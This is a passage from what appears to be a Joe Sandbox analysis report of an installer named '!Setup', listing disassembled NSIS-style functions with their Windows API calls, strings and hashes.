Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
